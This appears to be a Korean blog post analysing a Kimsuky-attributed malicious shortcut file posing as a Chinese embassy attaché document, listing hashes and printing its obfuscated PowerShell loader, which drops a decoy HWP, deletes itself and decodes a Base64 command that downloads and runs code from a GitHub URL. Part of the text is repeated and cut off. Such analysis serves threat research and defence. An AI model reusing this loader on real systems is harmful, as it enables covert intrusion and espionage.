김수키(Kimsuky) 추정 국방대학교 안보정책학부 교수를 노린 주한 중화인민공화국 대사관 무관부 사칭 악성코드
Contents
오늘은 별로 존경을 하고 있지 않은 북한 해킹 단체 김수키(Kimsuky) 추정 국방대학교 안보정책학부 교수를 노린 주한 중화인민공화국 대사관 무관부 사칭 악성코드 사칭 악성코드에 대해 알아보겠습니다.
파일명:주한 중화인민공화국 대사관 무관부.lnk
사이즈:66,125 Bytes
MD5:55fc6e5127e9409d10f57f7e5abca50b
SHA-1:25f648c7d0d4867bd3635cbb8099582a3fb0704f
SHA-256:74e10df9726c953692fefc468b724c78c7d08ad934a2acbcd1971a877aa3c2e7
입니다.
북한 애들은 최근 깃허브를 악용을 해서 이것을 사이트를 차단할 수가 없고 아무튼 깃허브가 유행인 것 같습니다.
Powershell 코드
StringData
{
namestring: not present
relativepath: not present
workingdir:
commandlinearguments: /c start /min powe(r0shell -windowstyle hidden $lk=ls -Pa
th '.\' ^| Where {$_.length -e(q)66125};if($lk -eq $null) {$lk=ls -Path $env:tem
(p) -depth 2 ^| Where {$_.length -eq 66125}};$n=$lk.name.Replace('(.)lnk','.hwp');$l
k=$lk.FullName;$file = [System.IO.File]::ReadAllBytes($lk);$file1=[byte[]]$file[5709..
(5709+60416-1)];$fPath=$lk.Replace('.lnk','.hwp');[System.IO.File]::WriteAllBytes($fP
ath,$file1);^&$fPath;ri $lk -force;if($lk.contains('\Temp')){$slardar='J?????????????';
$kk='[System'+'.Text.Encoding]::UTF8.GetString([System'(+)'.Convert]::From'(+)'Base6'+'
4String($slardar))';$kk=Invoke-expression $kk;$pp=Invoke-expression $kk;sleep 2;del $p
p;cpi $fPath $env:temp;sleep 1;Compress-Archive -Path $env:temp\$n -DestinationPath $p
p;sta(r)t $pp -windowstyle minimized};$bb='JGRuc3RyID0gKE5ldy1PYmplY3QgL?????????luZyg
naHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2FldWZmZi9pcnN0L3JlZnMvaGVhZHMvbWFpbi9ub3
RlJyk7aWV4ICRkbnN0cg==';$dns=Invoke-expression '[System'+'.Text.Encoding]::UTF8.GetStri
ng([System'+'.Convert]::From'+'Base6'+'4String($bb))';Invoke-expression $dns
iconlocation: hxxps://raw(.)githubusercontent(.)com/aeufff/econd/refs/heads/main/p(.)ico
}
분석
1.숨김(minimized (+) hidden) PowerShell 세션을 시작하며 문자열 결합과 Base64 인코딩으로 스크립트를 난독화한 뒤 실행
현재 폴더와 %TEMP% 를 검색하여 크기 66,125바이트인 파일을 검색
2.LNK 파일 바이트에서 오프셋 5709부터 60416 바이트 를 잘라내서 .hwp 파일로 저장<-이게 디코이
.hwp 파일을 생성하고 나서 원본 .lnk 는 삭제
3.숨겨진 페이로드 부분
$slardar 는 Base64로 인코딩된 PowerShell 스크립트
디코딩 실행하면 추가 스크립트가 생성되어 $pp 에 저장
추출된 .hwp를 …
파일명:주한 중화인민공화국 대사관 무관부.lnk
사이즈:66,125 Bytes
MD5:55fc6e5127e9409d10f57f7e5abca50b
SHA-1:25f648c7d0d4867bd3635cbb8099582a3fb0704f
SHA-256:74e10df9726c953692fefc468b724c78c7d08ad934a2acbcd1971a877aa3c2e7
입니다.
북한 애들은 최근 깃허브를 악용을 해서 이것을 사이트를 차단할 수가 없고 아무튼 깃허브가 유행인 것 같습니다.
Powershell 코드
StringData
{
namestring: not present
relativepath: not present
workingdir:
commandlinearguments: /c start /min powe(r0shell -windowstyle hidden $lk=ls -Pa
th '.\' ^| Where {$_.length -e(q)66125};if($lk -eq $null) {$lk=ls -Path $env:tem
(p) -depth 2 ^| Where {$_.length -eq 66125}};$n=$lk.name.Replace('(.)lnk','.hwp');$l
k=$lk.FullName;$file = [System.IO.File]::ReadAllBytes($lk);$file1=[byte[]]$file[5709..
(5709+60416-1)];$fPath=$lk.Replace('.lnk','.hwp');[System.IO.File]::WriteAllBytes($fP
ath,$file1);^&$fPath;ri $lk -force;if($lk.contains('\Temp')){$slardar='J?????????????';
$kk='[System'+'.Text.Encoding]::UTF8.GetString([System'(+)'.Convert]::From'(+)'Base6'+'
4String($slardar))';$kk=Invoke-expression $kk;$pp=Invoke-expression $kk;sleep 2;del $p
p;cpi $fPath $env:temp;sleep 1;Compress-Archive -Path $env:temp\$n -DestinationPath $p
p;sta(r)t $pp -windowstyle minimized};$bb='JGRuc3RyID0gKE5ldy1PYmplY3QgL?????????luZyg
naHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2FldWZmZi9pcnN0L3JlZnMvaGVhZHMvbWFpbi9ub3
RlJyk7aWV4ICRkbnN0cg==';$dns=Invoke-expression '[System'+'.Text.Encoding]::UTF8.GetStri
ng([System'+'.Convert]::From'+'Base6'+'4String($bb))';Invoke-expression $dns
iconlocation: hxxps://raw(.)githubusercontent(.)com/aeufff/econd/refs/heads/main/p(.)ico
}
분석
1.숨김(minimized (+) hidden) PowerShell 세션을 시작하며 문자열 결합과 Base64 인코딩으로 스크립트를 난독화한 뒤 실행
현재 폴더와 %TEMP% 를 검색하여 크기 66,125바이트인 파일을 검색
2.LNK 파일 바이트에서 오프셋 5709부터 60416 바이트 를 잘라내서 .hwp 파일로 저장<-이게 디코이
.hwp 파일을 생성하고 나서 원본 .lnk 는 삭제
3.숨겨진 페이로드 부분
$slardar 는 Base64로 인코딩된 PowerShell 스크립트
디코딩 실행하면 추가 스크립트가 생성되어 $pp 에 저장
추출된 .hwp를 …
IoC
55fc6e5127e9409d10f57f7e5abca50b
74e10df9726c953692fefc468b724c78c7d08ad934a2acbcd1971a877aa3c2e7
25f648c7d0d4867bd3635cbb8099582a3fb0704f
74e10df9726c953692fefc468b724c78c7d08ad934a2acbcd1971a877aa3c2e7
25f648c7d0d4867bd3635cbb8099582a3fb0704f